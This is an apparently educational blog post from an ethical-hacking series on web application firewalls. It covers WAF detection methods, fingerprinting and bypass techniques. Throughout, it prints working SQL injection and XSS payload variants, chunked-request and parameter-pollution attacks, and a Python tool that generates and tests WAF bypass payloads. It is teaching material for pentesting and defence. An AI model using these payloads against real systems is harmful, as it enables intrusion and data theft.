Learn Ethical Hacking (#25) - Web Application Firewalls - Bypassing the Guards

@scipio 70

about 2 months ago

StemSocial

What will I learn

What WAFs are and how they work: signature-based, behavioral, and anomaly-based detection, plus reverse-proxy, host-based, and cloud deployments;
Identifying the WAF: fingerprinting ModSecurity, Cloudflare, AWS WAF, Akamai;
Bypass techniques: encoding, chunking, HTTP parameter pollution, Unicode normalization;
WAF rule testing methodology: finding what's blocked and what slips through;
Building a WAF bypass toolkit in Python;
Real-world WAF bypass case studies and what they teach us about defense in depth;
Why WAFs are a speed bump, not a wall -- and why fixing the actual vulnerability matters more.

Requirements

A working modern computer running macOS, Windows or Ubuntu;
Your hacking lab from Episode 2 (Kali Linux);
Python 3 with requests (pip install requests);
ModSecurity with OWASP CRS (for lab testing -- installation instructions below);
The ambition to learn ethical hacking and security research.

Difficulty

Intermediate

Curriculum (of the `Learn Ethical Hacking` series):

Solutions to Episode 24 Exercises

Exercise 1 -- WordPress lab scan:

WPScan output (typical Docker WordPress):
- WordPress version: 6.4.x (from meta generator)
- Theme: twentytwentyfour (default)
- Plugins: contact-form-7 (detected via readme.txt)
- Users: admin (via REST API /wp-json/wp/v2/users)
- XML-RPC: enabled (system.multicall available)
- readme.html: accessible (information disclosure)

searchsploit results vary by plugin version.
Contact Form 7 has had stored XSS and file upload CVEs.

The key insight: a default WordPress installation with one popular plugin already has multiple enumeration vectors and potential vulnerabilities. Every additional plugin multiplies the attack surface.

Exercise 2 -- WordPress auditor:

import requests
import re

def audit_wp(url):
    # Version from generator meta
    resp = requests.get(url, timeout=10)
    if 'generator' in resp.text:
        ver = re.search(r'WordPress (\d+\.\d+\.?\d*)', resp.text)
        if ver: print(f"[*] WordPress {ver.group(1)}")

    # REST API users
    users = requests.get(f"{url}/wp-json/wp/v2/users", timeout=5)
    if users.status_code == 200:
        for u in users.json():
            print(f"[+] User: {u['slug']}")

    # XML-RPC
    xmlrpc = requests.post(f"{url}/xmlrpc.php",
        data='<?xml version="1.0"?><methodCall>'
             '<methodName>system.listMethods</methodName></methodCall>',
        timeout=5)
    if 'listMethods' in xmlrpc.text:
        print("[!] XML-RPC enabled -- brute force and DDoS vector")

    # Plugin detection
    common = ['contact-form-7', 'akismet', 'jetpack', 'woocommerce',
              'elementor', 'wordfence', 'yoast-seo', 'wp-mail-smtp',
              'classic-editor', 'really-simple-ssl', 'updraftplus']
    for plugin in common:
        r = requests.get(f"{url}/wp-content/plugins/{plugin}/readme.txt",
            timeout=5)
        if r.status_code == 200:
            v = re.search(r'Stable tag:\s*([\d.]+)', r.text, re.IGNORECASE)
            ver = v.group(1) if v else "unknown"
            print(f"[+] Plugin: {plugin} v{ver}")

    # Security headers
    for hdr in ['X-Frame-Options', 'Content-Security-Policy',
                'X-Content-Type-Options', 'Strict-Transport-Security']:
        if hdr.lower() not in {k.lower() for k in resp.headers}:
            print(f"[!] Missing: {hdr}")

Exercise 3 -- Plugin vulnerability research:

Three high-impact WP plugin vulnerabilities (2023-2024):
1. Elementor Pro (2023): Auth bypass + RCE, CVSS 9.8, 12M+ installs
2. WP Fastest Cache (2023): SQL injection, CVSS 9.8, 1M+ installs
3. Ultimate Member (2023): Privilege escalation to admin, CVSS 9.8, 200K+ installs
All three were exploited in the wild before patches were widely deployed.

These are ALL vulnerability classes we covered earlier in this series -- SQLi (episodes 12-13), XSS, auth bypass (episode 17) -- just wrapped inside WordPress plugins. The CMS doesn't introduce new vulnerability types. It introduces a new scale at which old vulnerability types can be exploited.

Learn Ethical Hacking (#25) - Web Application Firewalls - Bypassing the Guards

Over the past fourteen episodes we've built up quite an arsenal of web application attacks. SQL injection (episodes 12-13), XSS (14-15), CSRF (16), authentication bypass (17), SSRF (18), deserialization (19), file uploads (20), API abuse (21), business logic exploitation (22), client-side attacks (23), and CMS hacking (24). Every single one of those attacks targets a vulnerability in the application's code -- broken input validation, missing authorization checks, unsafe data handling. The attacks work because the APPLICATION is flawed.

But what happens when someone puts a security guard between you and the application?

A Web Application Firewall (WAF) sits in front of a web application, inspects every incoming HTTP request, and blocks anything that looks like an attack. Think of it as a bouncer at a club who checks your bag before letting you in. The bouncer has a list of banned items: knives, drugs, weapons. If your bag contains something on the list, you're turned away at the door. You never reach the club. The bartender never sees you. The vulnerability inside (maybe the bartender gives away free drinks if you ask nicely) is irrelevant because you didn't get past the bouncer.

The problem with bouncers? They follow rules. And if you know the rules, you can work around them. Wrap the knife in a towel. Put it in a different pocket. Disassemble it and bring it in pieces. The bouncer checks the bag, finds nothing on the list, waves you through. You reassemble the knife inside. The rules didn't change. Your presentation did.

That is WAF bypassing in a nutshell. The WAF has rules about what attack patterns look like. The attacker rephrases the attack so it doesn't match the rules. The application behind the WAF still processes the rephrased attack exactly the same way. The vulnerability hasn't gone anywhere -- the WAF just temporarily obscured it.

A WAF is a delay, not a solution.

Having said that, WAFs are NOT useless. They stop automated scanners, drive-by attacks, script kiddies running sqlmap with default settings, and the vast majority of opportunistic attacks that make up the background noise of the internet. As a rough rule of thumb, a properly configured WAF filters out something like 90-95% of the attack traffic hitting a typical web application. That's valuable. But that remaining 5-10%? That's the skilled attacker. The one doing a pentest. The one who reads episodes like this one and knows how the bouncer thinks ;-)

How WAFs Work

WAFs inspect HTTP requests (and sometimes responses) using three main approaches, and most modern WAFs combine all three:

Signature-based detection is the oldest and most common method. The WAF maintains a database of known attack patterns -- regular expressions and string matches that identify malicious content. If a request parameter contains UNION SELECT, that matches a SQL injection signature. If the URL contains <script>, that matches an XSS signature. If the request body contains ../../../etc/passwd, that matches a path traversal signature. Fast, deterministic, and easy to understand. Also the easiest to bypass, because changing the representation of the attack (without changing its meaning to the application) breaks the signature match.
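
To make that concrete, here is a minimal sketch of a signature matcher. The three patterns and the function name `naive_waf_blocks` are made up for illustration (real rulesets such as the OWASP CRS are far larger and smarter), but the failure mode is the same: change the representation and the match breaks.

```python
import re

# Hypothetical signature list, deliberately case-sensitive to show the weakness.
SIGNATURES = [
    re.compile(r"UNION SELECT"),   # SQL injection
    re.compile(r"<script>"),       # XSS
    re.compile(r"\.\./\.\./"),     # path traversal
]

def naive_waf_blocks(value: str) -> bool:
    """Return True if any signature matches the raw parameter value."""
    return any(sig.search(value) for sig in SIGNATURES)

if __name__ == "__main__":
    probes = [
        "1' UNION SELECT 1,2,3-- -",
        "1' UnIoN SeLeCt 1,2,3-- -",
        "<script>alert(1)</script>",
        "<ScRiPt>alert(1)</ScRiPt>",
    ]
    for probe in probes:
        verdict = "BLOCKED" if naive_waf_blocks(probe) else "passed"
        print(f"{verdict:8} {probe}")
```

The mixed-case probes pass because the patterns compare bytes, not meaning. A real WAF would lowercase first, which is exactly why attackers then move on to comments, encodings and alternative syntax.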

Behavioral analysis looks at patterns over time rather than individual requests. Too many requests from one IP? Possible brute force or scanning. Requests to non-existent URLs in sequence? Possible directory enumeration. Same request pattern repeated across multiple IPs? Possible botnet. This approach catches automated tools (Nikto, DirBuster, sqlmap in default mode) because they generate predictable traffic patterns. Harder to bypass because the attacker needs to change their behavior, not just their payload encoding.
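
A rough sketch of the simplest behavioral rule, a sliding-window request counter per client IP. The class name `RateMonitor` and the thresholds are assumptions for the example; production WAFs track many more signals than request rate.

```python
from collections import defaultdict, deque

class RateMonitor:
    """Flag a client that exceeds max_requests within window_seconds."""

    def __init__(self, max_requests: int = 20, window_seconds: float = 10.0):
        self.max_requests = max_requests
        self.window_seconds = window_seconds
        self._seen = defaultdict(deque)   # client IP -> recent request timestamps

    def is_suspicious(self, client_ip: str, now: float) -> bool:
        stamps = self._seen[client_ip]
        stamps.append(now)
        # Drop timestamps that have fallen out of the window.
        while stamps and now - stamps[0] > self.window_seconds:
            stamps.popleft()
        return len(stamps) > self.max_requests

if __name__ == "__main__":
    monitor = RateMonitor(max_requests=5, window_seconds=1.0)
    # Ten requests at 0.1 s intervals (scanner-like traffic).
    fast = [monitor.is_suspicious("10.0.0.5", t * 0.1) for t in range(10)]
    # Ten requests spaced 2 s apart (throttled traffic).
    slow = [monitor.is_suspicious("10.0.0.6", t * 2.0) for t in range(10)]
    print("fast client flagged:", any(fast))
    print("slow client flagged:", any(slow))
```

This is why throttling your tools matters during a pentest: the payload is identical in both runs, only the timing differs.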

Machine learning / anomaly detection trains a model on "normal" traffic and flags deviations. If the application normally receives parameter values that are 10-50 characters of alphanumeric text, a 500-character string full of SQL syntax is anomalous. Some cloud WAFs (Cloudflare, AWS WAF with managed rules) use ML models trained on billions of requests across millions of sites. The upside: they can detect zero-day attack patterns that no signature exists for. The downside: false positives (legitimate requests flagged as attacks) and the possibility of training the model to accept malicious patterns by slowly normalizing them over time.
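
Real ML-based WAFs are far more sophisticated, but the core idea fits in a few lines. The sketch below is a toy stand-in, not how any vendor actually does it: it learns the typical length of a parameter from sample values and flags anything far outside that range or unusually heavy on special characters. The class name, thresholds and sample data are all assumptions.

```python
import statistics

def special_ratio(value: str) -> float:
    """Fraction of characters that are neither alphanumeric nor a space."""
    if not value:
        return 0.0
    odd = sum(1 for c in value if not (c.isalnum() or c == " "))
    return odd / len(value)

class ToyAnomalyModel:
    """Learn mean/spread of value lengths from a baseline, flag outliers."""

    def __init__(self, baseline: list[str], z_threshold: float = 3.0,
                 ratio_threshold: float = 0.15):
        lengths = [len(v) for v in baseline]
        self.mean = statistics.mean(lengths)
        self.stdev = statistics.pstdev(lengths) or 1.0   # avoid division by zero
        self.z_threshold = z_threshold
        self.ratio_threshold = ratio_threshold

    def is_anomalous(self, value: str) -> bool:
        z = abs(len(value) - self.mean) / self.stdev
        return z > self.z_threshold or special_ratio(value) > self.ratio_threshold

if __name__ == "__main__":
    model = ToyAnomalyModel(["laptop", "red shoes", "usb cable 2m",
                             "winter jacket", "coffee beans"])
    for value in ["blue socks", "1' UNION SELECT user,password FROM users-- -"]:
        print(model.is_anomalous(value), value)
```

The false-positive problem is visible even here: a legitimate search for a long product name with punctuation would trip the same thresholds.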

WAF architectures:

1. Reverse Proxy WAF (most common):
   Client -> WAF -> Web Server -> Application
   The WAF terminates the connection, inspects everything, then forwards
   clean requests. ModSecurity, AWS WAF, Cloudflare all work this way.

2. Host-based WAF (embedded):
   Client -> Web Server + WAF Module -> Application
   ModSecurity as an Apache/Nginx module runs inside the web server itself.
   Lower latency but limited to what the web server exposes.

3. Cloud WAF (SaaS):
   Client -> Cloud Edge (Cloudflare/Akamai/etc) -> Origin Server
   DNS points to the cloud provider, which proxies all traffic.
   The origin server IP must be hidden -- if the attacker finds
   the direct IP, they bypass the WAF entirely.

That last point about cloud WAFs is critical. Cloudflare only protects traffic that goes THROUGH Cloudflare. If you can discover the origin server's real IP address (through historical DNS records, email headers, subdomain enumeration, or certificate transparency logs -- all techniques from episode 4), you can send requests directly to the origin and skip the WAF completely. This is the most common WAF "bypass" in the wild and it's not even a WAF weakness -- it's a deployment misconfiguration.
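
Once your recon has produced a list of candidate IPs, a first filter is to throw away everything that belongs to the cloud edge itself. The sketch below assumes a Cloudflare-fronted target and uses only a small illustrative subset of Cloudflare's published IPv4 ranges; for real work you would load the full, current list. The function names and the candidate addresses are hypothetical.

```python
import ipaddress

# Illustrative subset of Cloudflare's published IPv4 ranges (assumption:
# fetch the complete, current list before relying on this in an engagement).
CLOUDFLARE_RANGES = [ipaddress.ip_network(net) for net in (
    "104.16.0.0/13",
    "172.64.0.0/13",
    "173.245.48.0/20",
)]

def behind_cloud_edge(ip: str) -> bool:
    """True if the address falls inside one of the known edge ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUDFLARE_RANGES)

def possible_origins(candidates: list[str]) -> list[str]:
    """Keep only candidates that are NOT edge addresses."""
    return [ip for ip in candidates if not behind_cloud_edge(ip)]

if __name__ == "__main__":
    # Hypothetical addresses collected from DNS history, mail headers, etc.
    found = ["104.18.32.7", "203.0.113.10"]
    print("Worth probing directly:", possible_origins(found))
```

Anything that survives the filter still has to be confirmed, for example by requesting the site from that IP with the right Host header and comparing the response.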

WAF Identification

Before bypassing a WAF, you need to know which one you're dealing with. Different WAFs have different rule sets, different bypass techniques, and different error pages. Identifying the WAF tells you which playbook to use.

# wafw00f -- dedicated WAF fingerprinting tool (pre-installed on Kali)
wafw00f http://target.com

# Output examples:
# [+] The site http://target.com is behind Cloudflare (Cloudflare Inc.)
# [+] The site http://target.com is behind ModSecurity (SpiderLabs/Trustwave)
# [+] The site http://target.com is behind AWS WAF (Amazon)

# Manual fingerprinting via response headers
curl -sI http://target.com | grep -i -E "server|x-cdn|cf-|x-sucuri|x-waf|x-amzn|x-akamai"
# Cloudflare: Server: cloudflare, cf-ray header present
# Sucuri:     X-Sucuri-ID header
# Imperva:    X-CDN: Imperva
# AWS WAF:    x-amzn-waf-action header on blocks
# Akamai:     X-Akamai-Transformed header

# Trigger a WAF block and examine the error page
curl -v "http://target.com/?id=1'+UNION+SELECT+1,2,3--"
# Cloudflare: "Attention Required! | Cloudflare" with Ray ID
# ModSecurity: "403 Forbidden" with ModSecurity unique ID in body/logs
# AWS WAF: "403 Forbidden" with x-amzn-requestid header
# F5 BIG-IP ASM: custom block page with support ID
# Barracuda: "You have been blocked" with orange Barracuda branding

The fingerprinting tells you two things: (1) which ruleset the WAF is likely running (Cloudflare has different default rules than ModSecurity CRS which has different rules than AWS Managed Rules), and (2) whether the WAF is a cloud proxy (meaning origin IP bypass might work) or host-based (meaning you have to go through it).

#!/usr/bin/env python3
"""WAF fingerprinter -- identify the WAF protecting a target."""
import requests
import re

def fingerprint_waf(url):
    """Send probes and analyze responses to identify the WAF."""
    results = {"waf_detected": False, "waf_name": "Unknown", "evidence": []}

    # Normal request for headers
    try:
        resp = requests.get(url, timeout=10,
            headers={"User-Agent": "Mozilla/5.0"})
    except requests.exceptions.RequestException as e:
        return {"error": str(e)}

    headers = {k.lower(): v for k, v in resp.headers.items()}

    # Header-based identification
    checks = [
        ("Cloudflare", lambda: "cf-ray" in headers or
            headers.get("server", "").lower() == "cloudflare"),
        ("Sucuri", lambda: "x-sucuri-id" in headers),
        ("Imperva/Incapsula", lambda: "x-cdn" in headers and
            "imperva" in headers.get("x-cdn", "").lower()),
        # x-amzn-requestid also appears on plain API Gateway responses,
        # so treat it as weak evidence on its own.
        ("AWS WAF", lambda: "x-amzn-waf-action" in headers or
            "x-amzn-requestid" in headers),
        ("Akamai", lambda: "x-akamai-transformed" in headers),
        ("F5 BIG-IP", lambda: "x-cnection" in headers or
            "bigipserver" in headers.get("set-cookie", "").lower()),
        ("Barracuda", lambda: "barra_counter_session" in
            headers.get("set-cookie", "").lower()),
    ]

    for name, check in checks:
        if check():
            results["waf_detected"] = True
            results["waf_name"] = name
            results["evidence"].append(f"Header match: {name}")
            break

    # Trigger-based identification (send a known-bad request)
    try:
        bad = requests.get(url, params={"test": "<script>alert(1)</script>"},
            timeout=10, headers={"User-Agent": "Mozilla/5.0"})

        if bad.status_code == 403:
            results["waf_detected"] = True
            results["evidence"].append("403 on XSS probe")

            # Check block page content
            body = bad.text.lower()
            if "cloudflare" in body:
                results["waf_name"] = "Cloudflare"
            elif "modsecurity" in body or "mod_security" in body:
                results["waf_name"] = "ModSecurity"
            elif "sucuri" in body:
                results["waf_name"] = "Sucuri"
            elif "blocked" in body and "barracuda" in body:
                results["waf_name"] = "Barracuda"

        elif bad.status_code == 406:
            results["waf_detected"] = True
            results["evidence"].append("406 Not Acceptable on XSS probe")
            results["waf_name"] = "ModSecurity (406 response)"

    except requests.exceptions.RequestException:
        # Probe failed (timeout, reset, ...); keep the header-based result
        pass

    return results

if __name__ == "__main__":
    import sys
    url = sys.argv[1] if len(sys.argv) > 1 else None
    if not url:
        print("Usage: python3 waf_fingerprint.py <url>")
        sys.exit(1)

    result = fingerprint_waf(url)
    print(f"\n[*] Target: {url}")
    if result.get("waf_detected"):
        print(f"[+] WAF detected: {result['waf_name']}")
        for e in result.get("evidence", []):
            print(f"    {e}")
    else:
        print("[-] No WAF detected (or WAF is transparent)")

Bypass Technique #1: Encoding and Obfuscation

This is the bread and butter of WAF bypassing. The WAF matches strings. If the string doesn't match the signature, the request passes through. The application behind the WAF then decodes the string and processes it normally. The key insight: WAFs and applications often decode data at DIFFERENT stages and in DIFFERENT ways.

# Original SQL injection (blocked by every WAF on the planet):
1' UNION SELECT user,password FROM users -- -

# URL encoding (the application's URL parser decodes this):
1'%20UNION%20SELECT%20user,password%20FROM%20users%20--%20-

# Double URL encoding (works if the app decodes twice, or if a
# reverse proxy decodes once and the app decodes again):
1'%2520UNION%2520SELECT%2520user,password%2520FROM%2520users%2520--%2520-

# Case alternation (SQL is case-insensitive, WAF regex might not be):
1' UnIoN sElEcT user,password FrOm users -- -

# SQL comment injection (breaks up keywords):
1'/**/UNION/**/SELECT/**/user,password/**/FROM/**/users-- -

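# Inline comments within keywords (only works when a filter or proxy strips
# comments before the query reaches the database; MySQL itself treats a
# comment as a token separator, so UN/**/ION on its own is a syntax error):
1' UN/**/ION SEL/**/ECT user,password FR/**/OM users-- -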

# Hex encoding for string values:
1' UNION SELECT user,password FROM users WHERE user=0x61646D696E-- -

# Using CHAR() instead of string literals:
1' UNION SELECT user,password FROM users WHERE user=CHAR(97,100,109,105,110)-- -

# Tab instead of space (many SQL parsers accept tabs):
1'%09UNION%09SELECT%09user,password%09FROM%09users--%09-

# Newline instead of space:
1'%0aUNION%0aSELECT%0auser,password%0aFROM%0ausers--%0a-

# Null bytes (some WAFs stop processing at null byte, app continues):
1'%00UNION SELECT user,password FROM users-- -

For XSS bypasses (as we partially covered in episode 15), the same principle applies:

# Original (blocked):
<script>alert(1)</script>

# Case alternation:
<ScRiPt>alert(1)</ScRiPt>

# Event handler instead of script tag:
<img src=x onerror=alert(1)>

# SVG-based (different parser):
<svg onload=alert(1)>

# HTML entity encoding:
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>

# JavaScript protocol in href:
<a href="javascript:alert(1)">click</a>

# Template literal (backtick) injection:
<img src=x onerror=alert`1`>

The reason encoding bypasses work is fundamental: the WAF and the application use DIFFERENT parsers. The WAF has an approximation of SQL syntax, HTML syntax, JavaScript syntax. The database has the REAL SQL parser. The browser has the REAL HTML parser. When the WAF's approximation disagrees with the real parser about what a given input means, the attacker wins. This is an inherent problem with the WAF architecture -- it will NEVER be as accurate as the actual parsers it's trying to protect, because those parsers are the definitive authority on what constitutes valid input.
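
Here is a small sketch of that disagreement for the double URL encoding case. Both functions are hypothetical stand-ins: `waf_allows` models a WAF that decodes once before matching, `app_sees` models a stack where a proxy decodes once and the application decodes again.

```python
import re
from urllib.parse import unquote

SQLI = re.compile(r"union\s+select", re.IGNORECASE)

def waf_allows(raw_value: str) -> bool:
    """Hypothetical WAF: decode the value once, then apply the signature."""
    return SQLI.search(unquote(raw_value)) is None

def app_sees(raw_value: str) -> str:
    """Hypothetical backend: the value ends up decoded twice."""
    return unquote(unquote(raw_value))

if __name__ == "__main__":
    single = "1'%20UNION%20SELECT%201--%20-"
    double = "1'%2520UNION%2520SELECT%25201--%2520-"
    for label, value in (("single", single), ("double", double)):
        print(f"{label}: WAF allows={waf_allows(value)} app sees={app_sees(value)!r}")
```

After one decode the double-encoded value still reads `UNION%20SELECT`, which has no whitespace for the signature to match. The second decode, which only the backend performs, turns it back into the attack.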

Bypass Technique #2: HTTP Parameter Pollution

Different web servers handle duplicate parameters differently, and WAFs may only inspect one of them:

# HTTP Parameter Pollution (HPP)
# Send the same parameter twice with payload split across them

# Apache/PHP: uses LAST value
# ASP.NET/IIS: CONCATENATES all values with comma
# Tomcat/Java: uses FIRST value
# Flask/Python: uses FIRST value

# Attack against Apache/PHP backend:
curl "http://target.com/search?q=harmless&q='+UNION+SELECT+1--"
# WAF might only inspect FIRST parameter value ("harmless")
# PHP processes LAST value ("' UNION SELECT 1--")

# Attack against ASP.NET backend:
curl "http://target.com/search?q=1'+UNION/*&q=*/SELECT+1--"
# ASP.NET concatenates: "1' UNION/*,*/SELECT 1--"
# The SQL comment swallows the comma that the concatenation inserts
# WAF sees two fragments individually; neither matches a signature alone

HPP is particularly effective against WAFs that inspect individual parameter values in isolation without considering how the backend framework will reassemble them. The WAF sees q=harmless and finds nothing suspicious. The application sees q=' UNION SELECT 1--, which is SQL injection.
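
The three resolution strategies are easy to simulate. The sketch below uses `urllib.parse.parse_qs` to split a query string and a hypothetical `resolve` helper to mimic what each kind of backend would hand to the application; it is a model of the behavior, not the frameworks' actual code.

```python
from urllib.parse import parse_qs

def resolve(query: str, param: str, strategy: str) -> str:
    """Return the value a backend would use for a duplicated parameter."""
    values = parse_qs(query, keep_blank_values=True).get(param, [])
    if not values:
        return ""
    if strategy == "first":    # e.g. Tomcat, Flask
        return values[0]
    if strategy == "last":     # e.g. PHP
        return values[-1]
    if strategy == "concat":   # e.g. ASP.NET (comma-joined)
        return ",".join(values)
    raise ValueError(f"unknown strategy: {strategy}")

if __name__ == "__main__":
    query = "q=harmless&q='+UNION+SELECT+1--"
    for strategy in ("first", "last", "concat"):
        print(f"{strategy:6} -> {resolve(query, 'q', strategy)!r}")
```

If the WAF resolves duplicates with one strategy and the backend with another, the two are literally inspecting different values.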

Bypass Technique #3: Chunked Transfer Encoding

Break the payload across HTTP chunks so the WAF sees individual fragments that don't match any signature:

POST /search HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

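4
q=1'
5
+UNIO
7
N+SELEC
8
T+1,2,3-
3
-+-
0

Each chunk is a harmless fragment. q=1' is just a partial parameter. +UNIO matches nothing. N+SELEC matches nothing. The number before each fragment is its length in bytes, written in hexadecimal, and it has to match exactly or the server rejects the request. The WAF processes chunks individually and finds nothing suspicious. The web server reassembles the chunks into the full request body, q=1'+UNION+SELECT+1,2,3--+-, which form-decodes to 1' UNION SELECT 1,2,3-- -. SQL injection.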

This works against WAFs that don't reassemble chunked requests before inspection. Most modern cloud WAFs (Cloudflare, AWS WAF) DO reassemble chunks now. But many on-premise WAFs, older ModSecurity configurations, and custom WAF solutions still inspect chunks individually. You won't know until you try.
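
Counting chunk bytes by hand is error-prone, so it helps to let code do it. This is a minimal sketch with two hypothetical helpers: `chunk_body` encodes a body using whatever chunk sizes you pick, and `dechunk` reassembles it the way the receiving server would, so you can check that the fragments add up to the payload you intended.

```python
def chunk_body(body: bytes, sizes: list[int]) -> bytes:
    """Encode body as HTTP/1.1 chunks, cycling through positive chunk sizes."""
    out = bytearray()
    pos = 0
    index = 0
    while pos < len(body):
        piece = body[pos:pos + sizes[index % len(sizes)]]
        # Chunk header is the piece length in hex, followed by CRLF.
        out += f"{len(piece):x}".encode() + b"\r\n" + piece + b"\r\n"
        pos += len(piece)
        index += 1
    out += b"0\r\n\r\n"   # zero-length chunk terminates the body
    return bytes(out)

def dechunk(encoded: bytes) -> bytes:
    """Reassemble a chunked body (no trailers or chunk extensions handled)."""
    body = bytearray()
    pos = 0
    while True:
        line_end = encoded.index(b"\r\n", pos)
        size = int(encoded[pos:line_end], 16)
        if size == 0:
            return bytes(body)
        start = line_end + 2
        body += encoded[start:start + size]
        pos = start + size + 2   # skip chunk data plus its trailing CRLF

if __name__ == "__main__":
    payload = b"q=1'+UNION+SELECT+1,2,3--+-"
    encoded = chunk_body(payload, [4, 5, 7, 8, 3])
    print(encoded.decode())
    print("Reassembled:", dechunk(encoded).decode())
```

Send the encoded bytes over a raw socket or through an intercepting proxy. High-level HTTP clients tend to re-frame the body themselves.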

Bypass Technique #4: Content-Type Manipulation

WAFs often only inspect request bodies in expected content types. If the WAF expects application/x-www-form-urlencoded or multipart/form-data (the standard form content types), sending the payload as JSON might bypass inspection entirely:

# Normal form submission (WAF inspects this):
curl -X POST http://target.com/login \
  -d "username=admin'+OR+1=1--&password=x"

# Same payload as JSON (WAF might not inspect this):
curl -X POST http://target.com/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin'\'' OR 1=1 --", "password": "x"}'

# XML content type (another variant):
curl -X POST http://target.com/login \
  -H "Content-Type: application/xml" \
  -d '<login><username>admin'\'' OR 1=1 --</username><password>x</password></login>'

This only works if the application accepts multiple content types for the same endpoint. Some stacks do: an Express app with both the JSON and urlencoded body parsers enabled, a Spring controller with several message converters, or a Flask/Django view written to fall back to the JSON body when there is no form data. In those cases the application code sees the same parameters regardless of content type. The WAF, configured to inspect form data, doesn't know the application also accepts JSON.
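
The gap can be modeled in a few lines. Both functions below are hypothetical: `waf_allows` stands for a WAF that only parses form-encoded bodies, and `app_params` for an application that happily reads the same fields from JSON or a form.

```python
import json
import re
from urllib.parse import parse_qs

SQLI = re.compile(r"'\s*or\s+1=1", re.IGNORECASE)

def waf_allows(content_type: str, body: str) -> bool:
    """Hypothetical WAF: inspects form bodies, waves everything else through."""
    if content_type != "application/x-www-form-urlencoded":
        return True
    fields = parse_qs(body)
    return not any(SQLI.search(v) for values in fields.values() for v in values)

def app_params(content_type: str, body: str) -> dict:
    """Hypothetical application: accepts JSON and form bodies alike."""
    if content_type == "application/json":
        return json.loads(body)
    return {key: values[0] for key, values in parse_qs(body).items()}

if __name__ == "__main__":
    form = "username=admin'+OR+1=1--&password=x"
    as_json = json.dumps({"username": "admin' OR 1=1 --", "password": "x"})
    for ctype, body in (("application/x-www-form-urlencoded", form),
                        ("application/json", as_json)):
        print(ctype, "| WAF allows:", waf_allows(ctype, body),
              "| app username:", app_params(ctype, body)["username"])
```

The defensive takeaway is the mirror image: either inspect every content type the application accepts, or make the application reject the ones it doesn't need.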

Bypass Technique #5: HTTP Method and Version Tricks

Some WAFs only inspect certain HTTP methods or don't handle protocol edge cases:

# WAF might only inspect GET and POST, not other methods
# Some apps treat HEAD like GET but return no body
# (use -I for HEAD; -X HEAD makes curl wait for a body that never arrives)
curl -I "http://target.com/?id=1'+UNION+SELECT+1--"

# HTTP/0.9 request (no headers, ancient protocol, some servers still support)
printf 'GET /search?q=<script>alert(1)</script>\r\n' | nc target.com 80
# HTTP/0.9 has no Content-Type, no headers -- just raw response
# The WAF might not know how to handle this

# Overriding the method via header (if the app supports it)
curl -X POST http://target.com/ \
  -H "X-HTTP-Method-Override: PUT" \
  -d '{"id": "1'\'' UNION SELECT 1--"}'

Building a WAF Bypass Toolkit

Here's a comprehensive payload generator that creates multiple bypass variants from a single base payload:

#!/usr/bin/env python3
"""
waf_bypass.py -- WAF bypass payload generator and tester.
Takes a base payload and generates encoded variants, then
optionally tests each against a target URL.
"""
import urllib.parse
import sys
import requests

def generate_bypasses(payload):
    """Generate WAF bypass variants of a payload."""
    variants = []

    # Original
    variants.append(("Original", payload))

    # URL encoding
    variants.append(("URL encoded",
        urllib.parse.quote(payload)))

    # Double URL encoding
    variants.append(("Double URL encoded",
        urllib.parse.quote(urllib.parse.quote(payload))))

    # Case alternation
    alt = ""
    for i, c in enumerate(payload):
        alt += c.upper() if i % 2 == 0 else c.lower()
    variants.append(("Case alternation", alt))

    # SQL comment injection (replace spaces with /**/)
    commented = payload.replace(" ", "/**/")
    variants.append(("Comment injection", commented))

    # Tab substitution
    variants.append(("Tab substitution",
        payload.replace(" ", "\t")))

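    # Newline substitution (raw character, like the tab variant above, so
    # the HTTP client encodes it exactly once as %0A)
    variants.append(("Newline injection",
        payload.replace(" ", "\n")))

    # Null byte prefix (raw character; sent as %00 after client encoding)
    variants.append(("Null byte prefix",
        "\x00" + payload))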

    # Mixed encoding (partial URL encode)
    mixed = ""
    for i, c in enumerate(payload):
        if c.isalpha() and i % 3 == 0:
            mixed += urllib.parse.quote(c)
        else:
            mixed += c
    variants.append(("Mixed encoding", mixed))

    # Inline comments within SQL keywords (only effective when some layer
    # strips comments before the database parses the query)
    kw_split = payload
    for kw in ["UNION", "SELECT", "FROM", "WHERE",
               "INSERT", "UPDATE", "DELETE", "DROP"]:
        if kw.upper() in kw_split.upper():
            mid = len(kw) // 2
            replacement = kw[:mid] + "/**/" + kw[mid:]
            kw_split = kw_split.replace(kw, replacement)
            kw_split = kw_split.replace(kw.lower(), replacement.lower())
    variants.append(("Keyword splitting", kw_split))

    return variants


def test_bypasses(url, param, payload, verbose=False):
    """Test each bypass variant against a live target."""
    variants = generate_bypasses(payload)

    print(f"\n{'='*60}")
    print(f"WAF Bypass Test: {url}")
    print(f"Parameter: {param}")
    print(f"Base payload: {payload}")
    print(f"{'='*60}\n")

    blocked = 0
    passed = 0

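    for name, variant in variants:
        try:
            # Note: requests percent-encodes params itself, so variants that
            # are already percent-encoded ("URL encoded", "Double URL encoded",
            # "Mixed encoding") gain one extra layer of encoding on the wire.
            resp = requests.get(url, params={param: variant},
                timeout=10, headers={"User-Agent": "Mozilla/5.0"})
            status = resp.status_code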

            if status in [403, 406, 429, 503]:
                blocked += 1
                marker = "BLOCKED"
            elif status == 200:
                passed += 1
                marker = "PASSED"
            else:
                marker = f"STATUS {status}"

            print(f"  [{marker}] {name}")
            if verbose:
                print(f"           {variant[:80]}...")

        except requests.exceptions.RequestException as e:
            print(f"  [ERROR] {name}: {e}")

    print(f"\n  Summary: {passed} passed, {blocked} blocked, "
          f"{len(variants)} total")
    if passed > 0:
        print(f"  [!] {passed} variant(s) bypassed the WAF")


if __name__ == "__main__":
    # Generate mode (no URL)
    if len(sys.argv) == 2 and not sys.argv[1].startswith("http"):
        payload = sys.argv[1]
        for name, variant in generate_bypasses(payload):
            print(f"  [{name}]")
            print(f"    {variant}\n")

    # Test mode (URL + param + payload)
    elif len(sys.argv) >= 4:
        url = sys.argv[1]
        param = sys.argv[2]
        payload = sys.argv[3]
        verbose = "--verbose" in sys.argv
        test_bypasses(url, param, payload, verbose)

    else:
        print("Usage:")
        print("  Generate: python3 waf_bypass.py '<payload>'")
        print("  Test:     python3 waf_bypass.py <url> <param> '<payload>' [--verbose]")
        sys.exit(1)

Run it in generate mode to see all variants of a payload, or in test mode against a ModSecurity instance in your lab to see which ones get through:

# Generate variants
